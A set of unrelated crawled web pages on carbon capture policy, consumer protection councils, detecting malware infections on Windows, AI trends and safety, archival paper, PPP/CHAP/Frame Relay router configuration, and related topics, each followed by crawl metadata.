The roundtable follows up on the release of a new IEF report entitled, “Strategies to Scale Carbon Capture Utilization and Storage.” CCUS capacity needs to grow from 40 million tons today to at least 5,600 million tons by 2050 to meet Paris goals of limiting global warming to 1.5 to 2.0 degrees by 2050, according to the report. CCUS has the potential to account for, at least, one-fifth of the CO2 emissions cuts required to meet that goal.
The report points to the critical role of market forces in bringing CCUS to scale and highlights the need for measures to de-risk CCUS finance and incentivize clustering in industrial parks to improve synergies across different industries. CCUS must be incorporated into large-scale industrial planning, national recovery plans, Environmental, Social and Governance standards, and Nationally Determined Contributions for countries as they plot their pathways to net zero, the report says.
“The IEF report on strategies to scale CCUS … speaks to the timeliness and versatility and the relevance of these technologies and the leverage government and industry stakeholders can seize,” said Dan Dorner, Head of CEM.
The roundtable concluded that CCUS forges a link between energy security, affordable energy access and climate change mitigation. It provides a versatile technology to reduce emissions in hard-to-abate sectors and offers investors incentives and more predictability across value chains without stranding jobs or assets, experts said.
From the US perspective, Maria DiGiulian, Acting Deputy Assistant Secretary for International Affairs at the US Department of Energy said the current administration was pumping investment into research, development, and deployment in different types of carbon capture, use and storage options.
“Whether CO2 is captured from a point source or through direct air capture technologies, secure and reliable CO2 storage is critical in helping us to meet our climate goals,” she said.
“Our focus is to expand carbon capture into the natural gas space and in hard-to-abate industrial sectors such as ethanol, hydrogen, cement, paper and steel production.”
“For the production of synthetic fuels and chemicals with CO2 as a feedstock, the sourcing of low carbon hydrogen will be critical. There is significant potential in applying carbon capture to help advance a cost-effective and low-carbon hydrogen economy,” she added.
The UK is already quite advanced in its planning for a series of CCUS projects tied to major industrial clusters, said Alex Milward, Director for CCUS at the UK’s Department for Business, Energy, and Industrial Strategy. The UK will announce the first wave of industrial clusters that will receive government support to be operational by the mid-2020s before the COP26 meeting in November, he said.
The UK has a target of storing 10 megatons of captured CO2 per annum by end of 2030, he added. | <urn:uuid:9f9c7868-bb79-43c8-bc65-bec013c0be80> | CC-MAIN-2022-40 | https://digitalinfranetwork.com/news/circular-carbon-technologies-must-help-meet-2050-emissions-goal/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00602.warc.gz | en | 0.932941 | 1,368 | 2.75 | 3 |
CPC is established under Consumer Protection Council Act, Cap 25, 2004 Laws of the Federation of Nigeria, to promote and protect the interest of consumers over all products and services. In a nutshell, it is empowered to; Eliminate hazardous & substandard goods from the market.
How do consumer protection councils help consumer?
‘Consumer Protection Councils’ help the consumers in the following ways: These councils guide the consumers on the method of filing cases in the consumer court. They also represent consumers in the consumer courts. They also create awareness among the people regarding their rights as consumers.
What are consumer councils?
The Act provides for a central consumer protection council, a state consumer protection council and a district consumer protection council. The objective of these councils is to render advice on the promotion and protection of the consumers’ rights at their respective levels.
What is a consumer protection council in India?
The National Consumer Disputes Redressal Commission (NCDRC), India is a quasi-judicial commission in India which was set up in 1988 under the Consumer Protection Act of 1986. Its head office is in New Delhi.
What is the role of consumer Council?
The Council, as a watchdog protects the rights and interests of consumers by promoting a fair and just delivery of goods and services. First and foremost the Consumer Council is an advocacy organisation, conducting rigorous research and policy analysis on key consumer issues.
What is the role of Consumer Protection Council in India?
The Consumer Protection Bill, 1986 seeks to provide for better protection of the interests of consumers and for the purpose, to make provision for the establishment of Consumer councils and other authorities for the settlement of consumer disputes and for matter connected therewith. (f) right to consumer education.
Who is the head of consumer protection council?
Babatunde Irukera is the Executive Vice-Chairman/Chief Executive Officer of the Federal Competition and Consumer Protection Commission, FCCPC (formerly Consumer Protection Council).
Where is the Consumer Protection Council?
Company Description: CONSUMER PROTECTION COUNCIL (CPC) is located in Abuja, Nigeria and is part of the Executive, Legislative, and Other General Government Support Industry. There are 482 companies in the CONSUMER PROTECTION COUNCIL (CPC) corporate family.
What is Consumer Protection Council 10?
Answer : consumer protection council is a non-government organisation, spreading awareness among common people and help them to file cases in the court and get justice for the consumers. They represent individuals in the consumer courts.
What is the State Consumer Protection Council and its features?
quantity, potency, purity, price and standards of goods and services. The other objectives include protection of consumers against unfair trade practices, provide consumer education and assure access to a variety of goods and services wherever possible. The recommendations of the council are advisory in nature.
What is the objective of consumer protection council?
Provide speedy redress to consumer complaints and end the unscrupulous exploitation of consumers. Educate consumers and champion consumer interests at appropriate forum. Enforce all enactments aimed at protecting consumers.
What are the major functions of the Consumer Protection Act?
Consumer Protection Act provides Consumer Rights to prevent consumers from fraud or specified unfair practices. These rights ensure that consumers can make better choices in the marketplace and get help with complaints.
What are the major functions of the Consumer Protection?
1. The Right to Protect against the marketing of goods which are hazardous to life and property of the consumers. 2. The Right to Information: information about the quality, quantity, purity, standard etc., to protect the consumer against unfair trade practices. | <urn:uuid:12b5515a-1d4d-4592-a987-5a0ed7b78c40> | CC-MAIN-2022-40 | https://bestmalwareremovaltools.com/physical/you-asked-what-is-the-consumer-protection-council.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00602.warc.gz | en | 0.916427 | 746 | 2.578125 | 3 |
Unfortunately, it may happen occasionally that the antivirus installed in your computer with its latest updates is incapable of detecting a new virus, worm or a Trojan. Sadly but true: no antivirus protection software gives you a 100% guarantee of complete security. If your computer does get infected, you need to determine the fact of infection, identify the infected file and send it to the vendor whose product missed the malicious program and failed to protect your computer.
However, users on their own are typically unable to detect that their computer got infected unless aided by antivirus solutions. Many worms and Trojans typically do not reveal their presence in any way. By way of exception, some Trojans do inform the user directly that their computer has been infected – they may encrypt the user’s personal files so as to demand a ransom for the decryption utility. However, a Trojan typically installs itself secretly in the system, often employs special disguising methods and also covertly does its activity. So, the fact of infection can be detected by indirect evidence only.
Symptoms of infection
An increase in the outgoing web traffic is the general indication of an infection; this applies to both individual computers and corporate networks. If no users are working in the Internet in a specific time period (e.g. at night), but the web traffic continues, this could mean that somebody or someone else is active on the system, and most probably that is a malicious activity. In a firewall is configured in the system, attempts by unknown applications to establish Internet connections may be indicative of an infection. Numerous advertisement windows popping up while visiting web-sites may signal that an adware in present in the system. If a computer freezes or crashes frequently, this may be also related to a malware activity. Such malfunctions are more often accounted for by hardware or software malfunctions rather than a virus activity. However, if similar symptoms simultaneously occur on multiple or numerous computers on the network, accompanied by a dramatic increase in the internal traffic, this is very likely caused by a network worm or a backdoor Trojan spreading across the network.
An infection may be also indirectly evidenced by non-computer related symptoms, such as bills for telephone calls that nobody made or SMS messages that nobody sent. Such facts may indicate that a phone Trojan is active in the computer or the cell phone. If unauthorized access has been gained to your personal bank account or your credit card has bee used without your authorization, this may signal that a spyware has intruded into your system.
What to do
The first thing to do is make sure that the antivirus database is up-to-date and scan your computer. If this does not help, antivirus solutions from other vendors may do the job. Many manufacturers of anti-virus solutions offer free versions of their products for trial or one-time scanning – we recommend you to run one of these products on your machine. If it detects a virus or a Trojan, make sure you send a copy of the infected file to the manufacturer of the antivirus solution that failed to detect it. This will help this vendor faster develop protection against this threat and protect other users running this antivirus from getting infected.
If an alternative antivirus does not detect any malware, it is recommended that you disconnect your computer from the Internet or a local network, disable Wi-Fi connection and the modem, if any, before you start looking for the infected file(s). Do not use the network unless critically needed. Do not use web payment systems or internet banking services under any circumstances. Avoid referring to any personal or confidential data; do not use any web-based services that require your screen name and password.
How do I find an infected file?
Detecting a virus or Trojan in your computer in some cases may be a complex problem requiring a technical qualification; however, in other cases that may be a pretty straightforward task – this all depends on the degree of the malware complexity and the methods used to hide the malicious code embedded into the system. In the difficult cases when special methods (e.g. rootkit technologies) are employed to disguise and conceal the malicious code in the system, a non-professional may be unable to track down the infected file. This problem may require special utilities or actions, like connecting the hard disk to another computer or booting the system from a CD. However, if a regular worm or simple Trojan is around, you may be able to track it down using fairly simple methods.
The vast majority of worms and Trojan need to take control when the system starts. There are two basic ways for that:
- A link to the infected file is written to the autorun keys of the Windows registry;
- The infected file is copied to an autorun folder in Windows.
The most common autorun folders in Windows 2000 and XP are as follows:
%Documents and Settings%\All Users\Start Menu\Programs\Startup\
There are quite a number of autorun keys in the system register, the most popular keys include Run, RunService, RunOnce и RunServiceOnce, located in the following register folders:
Most probably, a search at the above locations will yield several keys with names that don’t reveal much information, and paths to the executable files. Special attention should be paid to the files located in the Windows system catalog or root directory. Remember names of these files, you will need them in the further analysis.
Writing to the following key is also common:
The default value of this key is “%1″ %*”.
Windows’ system (and system 32) catalog and root directory are the most convenient place to set worms and Trojans. This is due to 2 facts: the contents of these catalogs are not shown in the Explorer by default, and these catalogs host a great number of different system files, functions of which are completely unknown to a lay user. Even an experienced user will probably find it difficult to tell if a file called winkrnl386.exe is part of the operating system or foreign to it.
It is recommended to use any file manager that can sort file by creation/modification date, and sort the files located within the above catalogs. This will display all recently created and modified files at the top of the catalog – these very files will be of interest to the researcher. If any of these files are identical to those occurring in the autorun keys, this is the first wake-up call.
Advanced users can also check the open network ports using netstat, the standard utility. It is recommended to set up a firewall and scan the processes engaged in network activities. It is also recommended to check the list of active processes using dedicated utilities with advanced functionalities rather than the standard Windows utilities – many Trojans successfully avoid being detected by standard Windows utilities.
However, no universal advice can be given for all occasions. Advanced worms and Trojans occur every now then that are quite difficult to track down. In this case, it is best to consult the support service of the IT security vendor that released your antivirus client, a company offering IT assistance services, or ask for help at specialized web forums. Such web resources include www.virusinfo.info and anti-malware.ru (Russian language), and www.rootkit.com and www.gmer.net (English). Similar forums designed to assist users are also run by many antivirus companies. | <urn:uuid:6bde5f9e-9b6b-4be5-897a-eefcb012bf9f> | CC-MAIN-2022-40 | https://encyclopedia.kaspersky.com/knowledge/what-if-my-computer-is-infected/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00602.warc.gz | en | 0.934257 | 1,545 | 2.8125 | 3 |
Analyzing factors such as population density, demographics, climate and transportation statistics could help policy-makers find strategies that could control the virus without taking a huge toll on the economy, one researcher says.
While it’s clear there’s no one-size-fits-all solution to protecting Americans and opening the economy, one researcher thinks software can help local officials devise more-granular solutions.
Sai Dinakarrao, an assistant professor in George Mason University’s Department of Electrical and Computer Engineering, believes analyzing factors such as population density, demographics, climate and transportation statistics could help policy-makers find strategies that would prevent surges in the virus without taking a huge toll on the economy, GMU officials said.
Dinakarrao, along with colleagues from University of California at Davis and Morgan State University in Baltimore, was recently awarded funding from the National Science Foundation to develop a model for pandemic, focusing on community spread, mitigation measures and the optimal distribution of health care resources in that context.
The researchers plan to develop a tool that is “generic and demography-agnostic that determines the best solution for a given topology, such as a state, county, or city,” Dinakarrao said.
Drawing from current COVID-19 data, the solution will incorporate “machine learning and stochastic optimization techniques to determine the best epidemic confinement strategy, depending on demographic information as well as the epidemic spread,” according to the award announcement.
“Given the uncertainty in the available data regarding COVID-19 due to varied testing strategies and false positives, our methodologies consider these variations to determine the optimal confinement strategy under the constraints of economic impact,” Dinakarrao said.
Because the researchers just started the year-long project, the tool will used for later waves of COVID-19, future pandemics or to mitigate bioterrorism threats. The solution is expected to have applicability beyond the current pandemic.
“We want our tool to be as scalable and futuristic as possible,” Dinakarrao said. “We want it to be able to function for any kind of pandemic.”
NEXT STORY: Santa Cruz bans predictive policing | <urn:uuid:862213cf-f9f9-4895-9721-5406f25bd2a6> | CC-MAIN-2022-40 | https://gcn.com/data-analytics/2020/07/can-software-help-local-governments-find-alternatives-to-covid-lockdowns/315058/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00602.warc.gz | en | 0.910828 | 469 | 2.96875 | 3 |
In 2022, we will see artificial intelligence continue along the path to becoming the most transformative technology humanity has ever developed. According to Google CEO Sundar Pichai, its impact will be even greater than that of fire or electricity on our development as a species. This may seem like a very ambitious claim, but considering it is already being used to help us tackle climate change, explore space, and develop treatments for cancer, the potential is clearly there.
The full scale of the impact that giving machines the ability to make decisions – and therefore enable decision-making to take place far more quickly and accurately than could ever be done by humans – is very difficult to conceive right now. But one thing we can be certain of is that in 2022 breakthroughs and new developments will continue to push the boundaries of what’s possible. Here’s my pick of the key areas and fields where those breakthroughs will occur in 2022:
The augmented workforce
There have always been fears that machines or robots will replace human workers and maybe even make some roles redundant. However, as companies navigate the process of creating data and AI-literate cultures within their teams, we will increasingly find ourselves working with or alongside machines that use smart and cognitive functionality to boost our own abilities and skills. In some functions, such as marketing, we’re already used to using tools that help us determine which leads are worth pursuing and what value we can expect from potential customers. In engineering roles, AI tools help us by providing predictive maintenance – letting us know ahead of time when machines will need servicing or repairing. In knowledge industries, such as law, we will increasingly use tools that help us sort through the ever-growing amount of data that's available to find the nuggets of information that we need for a particular task. In just about every occupation, smart tools and services are emerging that can help us do our jobs more efficiently, and in 2022 more of us will find that they are a part of our everyday working lives.
Bigger and better language modeling
Language modeling is a process that allows machines to understand and communicate with us in language we understand – or even take natural human languages and turn them into computer code that can run programs and applications. We have recently seen the release of GPT-3 by OpenAI, the most advanced (and largest) language model ever created, consisting of around 175 billion “parameters”- variables and datapoints that machines can use to process language. OpenAI is known to be working on a successor, GPT-4, that will be even more powerful. Although details haven’t been confirmed, some estimate that it may contain up to 100 trillion parameters, making it 500 times larger than GPT-3, and in theory taking a big step closer to being able to create language and hold conversations that are indistinguishable from those of a human. It will also become much better at creating computer code.
AI in cybersecurity
This year the World Economic Forum identified cybercrime as potentially posing a more significant risk to society than terrorism. As machines take over more of our lives, hacking and cybercrime inevitably become more of a problem, as every connected device you add to a network is inevitably a potential point-of-failure that an attacker could use against you. As networks of connected devices become more complex, identifying those points of failure becomes more complex. This is where AI can play a role, though. By analyzing network traffic and learning to recognize patterns that suggest nefarious intentions, smart algorithms are increasingly playing a role in keeping us safe from 21st-century crime. Some of the most significant applications of AI that we will see develop in 2022 are likely to be in this area.
AI and the Metaverse
The metaverse is the name given for a unified persistent digital environment, where users can work and play together. It’s a virtual world, like the internet, but with the emphasis on enabling immersive experiences, often created by the users themselves. The concept has become a hot topic since Mark Zuckerberg spoke about creating it by combing virtual reality technology with the social foundations of his Facebook platform.
AI will undoubtedly be a lynchpin of the metaverse. It will help to create online environments where humans will feel at home at having their creative impulses nurtured. We will also most likely become used to sharing our metaverse environments with AI beings that will help us with tasks we’re there to do, or just be our partner for a game of tennis or chess when we want to relax and unwind.
Low-code and no-code AI
A big barrier to the adoption of AI-driven efficiency in many companies is the scarcity of skilled AI engineers who can create the necessary tools and algorithms. No-code and low-code solutions aim to overcome this by offering simple interfaces that can be used, in theory, to construct increasingly complex AI systems. Much like the way web design and no-code UI tools now let users create web pages and other interactive systems simply by dragging and dropping graphical elements together, no-code AI systems will let us create smart programs by plugging together different, pre-made modules and feeding them with our own domain-specific data. Technologies such as natural language processing and language modeling (see above) mean that soon it may be possible to use nothing more than our voice or written instructions. All of this will play a key role in the ongoing "democratization” of AI and data technology.
AI is the "brains" that will guide the autonomous cars, boats, and aircraft that are set to revolutionize travel and society over the coming decade. 2022 should be a year to remember when we look back in the future and contemplate with horror the fact that we thought it was normal that 1.3 million people died of traffic accidents every year, 90% of which were caused by human error!
As well as increasingly effective autonomous cars – Tesla says its cars will demonstrate full self-driving capability by 2022, although it’s unlikely they will be ready for general use. Its competitors include Waymo (created by Google), Apple, GM, and Ford, and any of them can be expected to announce major leaps forward in the next year. The year will hopefully also see the first autonomous ship crossing the Atlantic, as the Mayflower Autonomous Ship (MAS), powered by IBM and designed in partnership with non-profit ProMare, will once again attempt the journey (having been forced to turn back during its initial attempt this year).
We know that AI can be used to create art, music, poetry, plays, and even video games. In 2022, as new models such as GPT-4 and Google’s Brain redefine the boundaries of what’s possible, we can expect more elaborate and seemingly “natural” creative output from our increasingly imaginative and capable electronic friends. Rather than these creations generally being demonstrations or experiments to show off the potential of AI, as is the case now, in 2022, we will increasingly see them applied to routine creative tasks, such as writing headlines for articles and newsletters, designing logos and infographics. Creativity is often seen as a very human skill, and the fact we are now seeing these capabilities emerging in machines means “artificial” intelligence is undeniably coming closer in terms of scope and function to the somewhat nebulous concept we have of what constitutes “real” intelligence. | <urn:uuid:7e5ce941-09fb-47bd-bc07-195dc85844fe> | CC-MAIN-2022-40 | https://bernardmarr.com/the-7-biggest-artificial-intelligence-ai-trends-in-2022/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00602.warc.gz | en | 0.955481 | 1,518 | 2.6875 | 3 |
From Frankenstein to I, Robot, we have for centuries been intrigued with and terrified of creating beings that might develop autonomy and free will. And now that we stand on the cusp of the age of ever-more-powerful artificial intelligence, the urgency of developing ways to ensure our creations always do what we want them to do is growing.
For some in AI, like Mark Zuckerberg , AI is just getting better all the time and if problems come up, technology will solve them. But for others, like Elon Musk , the time to start figuring out how to regulate powerful machine-learning-based systems is now. On this point, I’m with Musk. Not because I think the doomsday scenario that Hollywood loves to scare us with is around the corner but because Zuckerberg’s confidence that we can solve any future problems is contingent on Musk’s insistence that we need to “learn as much as possible” now.
How do humans work?
And among the things we urgently need to learn more about is not just how artificial intelligence works, but how humans work. Humans are the most elaborately cooperative species on the planet. We outflank every other animal in cognition and communication – tools that have enabled a division of labor and shared living in which we have to depend on others to do their part. That’s what our market economies and systems of government are all about. But sophisticated cognition and language—which AIs are already starting to use—are not the only features that make humans so wildly successful at cooperation.
Unwritten rules of group normativity
Humans are also the only species to have developed “group normativity” – an elaborate system of rules and norms that designate what is collectively acceptable and not acceptable for other people to do, kept in check by group efforts to punish those who break the rules. Many of these rules can be enforced by officials with prisons and courts but the simplest and most common punishments are enacted in groups: criticism and exclusion—refusing to play, in the park, market, or workplace, with those who violate norms. When it comes to the risks of AIs exercising free will, then, what we are really worried about is whether or not they will continue to play by and help enforce our rules. So far the AI community and the donors funding AI safety research – investors like Musk and several foundations – have mostly turned to ethicists and philosophers to help think through the challenge of building AI that plays nice. Thinkers like Nick Bostrom have raised important questions about the values AI, and AI researchers, should care about. […] | <urn:uuid:93433ff7-bcb1-4579-acbd-bef98749a4d7> | CC-MAIN-2022-40 | https://swisscognitive.ch/2017/09/17/control-ai-we-need-understand-humans/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00602.warc.gz | en | 0.958871 | 530 | 2.71875 | 3 |
If you’re interested in astronomy or have a kid that’s learning about the solar system in school, this 3D, interactive, Flash-driven model of the solar system can be really cool. You can check out the constellations with the Panoramatic view, zoom in on planets with the Heliocentric view, and focus on Earth with a Geocentric view.
You can perform a search for the heavenly bodies or zoom in and drag the objects around with your mouse. You can also change the date to see where objects were or will be. The settings are pretty customizable.
Go check out www.SolarSystemScope.com to begin your space exploration. | <urn:uuid:4e768f9d-ea1d-4288-9040-758d05904c25> | CC-MAIN-2022-40 | https://www.404techsupport.com/2011/04/02/solar-system-scope-an-interactive-3d-model-of-the-solar-system-and-night-sky/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00602.warc.gz | en | 0.918637 | 142 | 2.9375 | 3 |
Acid-Free and Archival Paper
In art, archival papers are essential if we want paper-bound works of art to stand the test of time. In business, archival papers might not seem as important (considering the increasing reliance on digital documents), but they still serve a purpose, especially for legal, historical, or other significant documents.
All types of paper can deteriorate over time. There are two ways to slow or eliminate deterioration. First, the production process must remove those things in the paper stock which cause it to change. Secondly, you must observe purposeful and careful storage and handling methods.
Why does paper deteriorate?
While the process is chemically complex, the simple answer is that paper is wood pulp. Wood pulp naturally contains lignin – an acidic substance that makes up the cellular walls in wood pulp. It’s this element that is the main culprit in paper deterioration. That deterioration accelerates through the lignin’s exposure to sunlight, water, or the passage of time.
You’ve probably seen a yellowed, brittle newspaper left outside. Even if it was just new last month, the combination of excessive lignin found in newsprint and the exposure to the elements means the deterioration process was extreme. It has been yellowed, stained, and might even begin to crumble.
Wood pulp can be chemically treated during the paper-making process to remove some, or all, of the lignin, thereby lowering the amount of acid in the paper stock.
It’s worth noting that even high-quality papers with low levels of lignin can suffer when they are not stored correctly for long periods. Semi-archival documents stored in folders made of cheap paper, or even in untreated wooden drawers or cabinets, will deteriorate faster than they usually would just by being in contact with those other, high-lignin content surfaces.
Acid-Free and Archival Papers
The paper’s natural acidity is measured by the alkaline, or pH, levels. The newsprint mentioned above, for example, has a very high pH level. In the 1930s, scientists discovered the connection between the alkaline levels in paper and their archival properties. By the 1950s, printers took steps to remove the acid from paper stock used for archival purposes.
While there are various standards for “acid-free” paper, high-quality papers have either had all the lignin removed through chemical processes or have exceptionally low pH levels that are considered acid-free.
The term “archival” is universal and can be used somewhat freely by paper manufacturers. However, in most cases, “archival” papers are deemed stable because they are usually acid-free, contain no unbleached pulp, and are free from the optical brighteners sometimes used to whiten the paper stock. While those kinds of papers last a long time without any deterioration, a cotton rag is used instead of wood pulp to manufacture truly archival paper. Therefore, it naturally has very little, if any, acidity.
The types of paper available to you for business purposes are wide-ranging. If you are concerned about the durability and stability of the paper, read the packaging. Begin by seeking out acid-free paper stock. Many high-quality papers might also use a combination of cotton rag and wood pulp. The balance between the two will give you a good idea of how you can expect it to age. | <urn:uuid:0b63084b-4a14-461c-8a91-ea358c3969f3> | CC-MAIN-2022-40 | https://www.capitalmds.com/acid-free-and-archival-paper/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00602.warc.gz | en | 0.94506 | 718 | 3.28125 | 3 |
You can go through the basic configuration and verification of the Point to point protocol (PPP). In the same way, it helps to learn how to configure and verify a PPP along with the PAP and CHAP authentication, and PPoE. This will operate in the layer 2 technologies. Additionally, the frame relay is the very cost efficient data transmission telecommunication service for the intermittent traffic. In the below sections, the operation, point to point and multipoint of the frame relay are clearly explained in detail with circuits.
The PPP stands for the point to point protocol, which operates on the OSI model in the layer 2. The HDLC is the Cisco proprietary and it is the default encapsulation on the serial links if the user has all the Cisco devices, or else they need to be PPP configured. In that, there are 2 types of the authentication which can be used along with the PPP such as CHAP and PAP.
In the above diagram, 3 routers, loop back connection, 2 switches, and 2 PC's are used. If the packet tracer or real devices are used, then it is important to cable the network. Perform the basic router configuration, such as disable the DNS lookup, hostname, password for the console, the message of a day banner, EXEC password, VTY connections and along with the synchronous logging. Then configure the interfaces on the R1, R2 as well as R3 with an IP addresses from the addressing table. Make sure that an IP addressing is perfectly right and also the interfaces are active with the help of issuing the show brief command of IP interface. After that, test as well as configure the Ethernet interfaces on the PC1 and PC3 by simply pinging the gateway which is set as default. Now the entire devices are connected and start it by configuring the OSPF.
Configuring the PPP is rather so simple:
The PAP is the password authentication protocol. The passwords are sent in the form of plain text and there is no protection or encryption. Here no periodic checks at all. This PAP is only used by the point to point protocol to validate the users before permitting them access to the server resources. Most of the remote server's networking operating system will support PAP. It is the very basic 2 way process.
When the Point to point protocol authentication PAP command is used, then the password and username are sent as 1 LCP data package, instead of the server sending the login prompt and simply waiting for the response.
The CHAP is the challenge handshake authentication protocol. The passwords are encrypted. It sends periodic checks to assure the router is speaking to the same router. It is more secure than the PAP. It follows the 3 way exchange of the shared secret. Basically, the PAP will stop it works once the authentication is accomplished and it provides the way to a network with the vulnerable. But CHAP conducts the periodic challenges to ensure that a remote host has the valuable and valid password during the link establishment.
In this the central site router initiates the three way handshake and also sends the challenge message to the remote router. Then the remote router responds to the central site router by sending the username and password. Then again the central site router password and username in their local database for the possible match, if it matches with that, then it will accept the connection. If it doesn't match, it will reject it.
The configuration procedure of the CHAP is mostly straightforward. Imagine that 2 router which is connected as left and right as shown in the below figure across the network.
Issue the command of encapsulation PPP on the interface as the first step in the configuration. Then, enable the CHAP authentication use on both the routers by using the command of PPP authentication CHAP. Configure the password and username. To perform that, provide the username as "username" and the password as "password" command, here username is the peer hostname. It is essential to ensure that the passwords are same at the both ends and the router password and username are exactly identical, because it is case sensitive.
The call comes in from the 766-1 to 3640-1, which is the initial step in the configuration.
The CHAP challenge packet will build.
Receipt & MD5 processing of a challenge packet from a peer.
The CHAP response packet is sent to an authentication is built.
From the below figure, it is possible to verify the CHAP configuration which is the most important step at most. In this the ID will help to find the real challenge packet and it is fed to the MD5 hash generator. Then the original challenge random number will fed to the ND5 hash generator. The 766-1 will search for the password from the local database or TACACS+server or RADIUS. Then the password will send to the MD5 hash generator. A hash value received in a response packet and compared with an MD% calculated hash value. The authentication process will succeed if a calculated hash value is equal.
The Ethernets are more causally called as PPPoE. It offers an emulated point to point link over the shared medium, especially the broadband aggregation network, which is found in the DSL service providers. The real fact is that, the scenario is to run the PPoE client on a user side, that connects to & acquire its configuration from a PPoE server at an ISP side. The ATM is run typically between the user's modem as well as DSLAM, though it can be transparent since the PPPoE client exists on the separate device.
In that, the client side configuration is relatively very simple. So that, create the dialer interface to manage a PPPoE connection and also tie that to the physical interface which offer the transport.
The dialer interface of the PPPoE:
Here, the line " ip address negotiated" is the one which instructs the client to use the IP address offered by a PPPoE server.
The frame relay is the standardized WAN technology, which specifies the logical and physical link layers of the digital telecommunication channels with the help of the packet switching methodology. It is designed for the cost efficient data transmission for the intermittent traffic in between the LAN and between the end points in the WAN. This frame relay adds data in the variable size unit called to an end point, that speeds the overall data transmission. This frame relay is provided by the number of the service providers such as AT & T. It is offered on the full T carrier system or functional T-1. The frame relay provides and complements the mid range service in between the ISDN, that offers the bandwidth at the 128 kbps and ATM, which runs in the same fashion to the frame relay but at the speeds from the 622.080 Mbps or 155.520 Mbps.
The frame relay is merely based on an older X.25 technology of packet switching that was designed for transferring the analog data like voice conversation. It is most often helps to connect the LANs with the major backbones and on the public WANs as well as in the private network environments with a leased line over the T-1 lines. It gives the dedicated and responsible connection during the period of transmission. Although, under some circumstances, the frame relay is used for the video and voice transmission.
It relays the packets at a data link layer of the OSI- open system interconnection model instead of the network layer. The frame can also incorporate the packets from the various protocols, including X.25 and Ethernet. It can be huge as a thousand bytes/ more and varies in size.
The frame relay is considered as the FR which consists of the customer nodes and FR switches. The frame relay switches will act as as the DCE and a customer equipment will work as the DTE. The virtual circuit is accomplished in between the DTE as well as the corresponding DCE. The virtual circuit is the one which identified by the Data link connection identifier - DLCI number. This DLCI has the local significance. It implies that the provided physical channel, there may not be 2 DLCI which are similar.
The frame relay is the packet switched network as well as it may compare with the X.25 network. However, both the X.25 and frame relay uses the similar basic HDLC protocol, there are many differences in between those two. The basic frame protocol, which is used in the frame relay is HDLC and the typical speed is higher than the X.25. The LAN connectivity for faster file transfers and interactive sessions are suitable for the frame relay and the protocol overhead as well as protocol complexity is comparatively lower than the X.25. The frame relay is implemented widely nowadays, which does not support the error correction of the node to node.
The point to point frame relay is the easiest one to configure. On the networks of the frame relay, the single VC originates at the local end and also terminate at a remote end. The subnet address is normally designated to the each connection of the point to point. Hence, only 1 DLCI has to configure with the point to point in the subinterface cases. For example, take the VC's local referenced DLCI at the hub router R3 is 304 & spoke routers as R4 is 403. The subnet address of 192.168.1.0/30 is allocated to that point to point network. Normally, the 30 bit subnet masks are used for the point to point connections to save the address space.
In that, the destination is identified as well as configured with a frame relay interface DLCI command at the beginning of the interface configuration mode. When it's configured, the command associates the chosen point to point with the DLCI. This command allows the user to choose the frame relay encapsulation type which has to be used on the particular VC. The command will be executed by without indicating the type of the frame relay encapsulation to be used.
Serial1/2.403 (up): point-to-point dlci, dlci 403(0xC9,0x3090), broadcast
status defined, active
( The output of the point to point frame relay as shown above)
While creating the frame relay, it is better practice to assign the subinterface number of the frame relay that the mirror a PVC frame relay DLCI value to that subinterface. In this case, there is no need to use the command of the frame relay map to perform the static address mapping. It most often assumes that an end point of a point to point connection resides automatically on a same subnet at the starting point.
By default, the physical interfaces are the multipoint interfaces on the Cisco router especially. When the multipoint Subinterfaces are created in the physical interface, then it is essential to assign DLCI specific to a multipoint subinterface. As default, the IOS software on the Cisco allocates all the unassigned DLCI are advertised by a fire, we relay switch to a router physical interface.
When the multipoint subinterfaces are created on the physical interface, then the DLCI of the virtual circuit is always assigned to a physical interface until it's specifically allocated to a subinterface with the help of the frame relay map protocol or frame relay interface DICI.
By learning the above things clearly, the configuration and verification of the PPP along with the CHAP and PAP authentication, PPPoE- client side only. This protocol and authentication techniques are widely used in the Cisco routers. The frame relay is the other wonderful topic explained with, perfect example and configuration. From that, it is very easy to understand the operations, multipoint and point to point types of the frame relay. This will help to gain greater knowledge on the frame relay.
SPECIAL OFFER: GET 10% OFF
Pass your Exam with ExamCollection's PREMIUM files!
SPECIAL OFFER: GET 10% OFF
Use Discount Code:
A confirmation link was sent to your e-mail.
Please check your mailbox for a message from firstname.lastname@example.org and follow the directions.
Download Free Demo of VCE Exam Simulator
Experience Avanset VCE Exam Simulator for yourself.
Simply submit your e-mail address below to get started with our interactive software demo of your free trial. | <urn:uuid:b1145cd1-8282-4aa7-9dfa-9e2a3c96adf7> | CC-MAIN-2022-40 | https://www.examcollection.com/certification-training/ccnp-configure-verify-ppp-and-basic-concepts-of-frame-relay.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00602.warc.gz | en | 0.927757 | 2,552 | 2.921875 | 3 |
An Automobile manufacturing plant is one of the largest industrial facilities in the world, there are thousands of automobiles being produced everyday.
Product Adopted:Digital Transmission
An Automobile manufacturing plant is one of the largest industrial facilities in the world, there are thousands of automobiles being produced everyday. An automotive assembly plant utilizes state-of-the-art robotic technology. Robotic machines are used in industrial automation to complete mundane repetitive tasks that are not desirable to workers.
